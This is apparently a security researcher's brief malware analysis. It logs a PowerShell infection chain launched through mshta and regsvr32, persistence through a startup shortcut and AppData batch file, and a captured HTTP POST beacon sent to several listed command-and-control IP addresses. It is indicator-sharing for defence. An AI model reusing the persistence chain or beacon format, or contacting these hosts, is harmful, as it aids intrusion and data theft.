Powershell Registry Malware

1. Powershell Registry Malware
2.  
3. explorer.exe opened --> mshta.exe which opened --> powershell.exe which opened --> regsvr32.exe
4.  
5. which
6. accessed startup\<random>.lnk
7. accessed AppData\Local\<random>\<random>.bat
8. Batch script TEXT : start "" "C:\Users\xxxxx\AppData\Local\<random>\<random>.77af
9.  
10. accessed AppData\Roaming\<random>\<random>.77af049f3
11.  
12. did http posts that successfully got out to the internet
13. 23.5.169.12 port 80 (SEE BELOW) and many many other ips 38.18.245.106 , 48.215.246.159 , 186.150.30.244 , etc.
14. accsessed cmd.exe
15.  
16. Sample HTTP post (there were many like this)
17.  
18. POST / HTTP/1.1
19. Content-Type: application/x-www-form-urlencoded
20. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
21. Host: 103.195.103.77
22. Pragma: no-cache
23. Content-Length: 380
24. Connection: Keep-Alive
25. X-BlueCoat-Via: b482d65b63647542
26.  
27. <Redacted possibly base64 ish>XPGjOqUo7vk4UbnskbnCpIxmzmW+cIFdQZzQNNWHLdtBQ/fjsiMMzGt+lkAUAnHaNx9frGe/pUx765TqasgQLsveRynHeA7HE1+0jQ3ffN2F7C5osAF2O1Pb4f3g8YvC7AaM+xRJTproGQI1iJj2w6MH7FnqEmmkTiWcSXWv9oYJ/8ZEwnBjrMPS7uxP5DADpr4piOhsX0ZLyiGNgnZ2/NVQZB92XwpyV9ynxV8tWH6qXzT0GtCIBG9UvS+AnrvgLVm4AenLPwc+ZMldJVdU5K1/vECmRB7Buf3paVETRGRWoYrWYso/x2lYUkPAQJJI+MrITvCOmhhnlwUc0+aIatgx6tsNVYY5zhzJw
28.  
29. ******
30. More FROM @neonprimetime security
31.  
32. http://pastebin.com/u/Neonprimetime
33. https://www.virustotal.com/en/USER/neonprimetime/
34. https://twitter.com/neonprimetime
35. https://www.reddit.com/USER/neonprimetime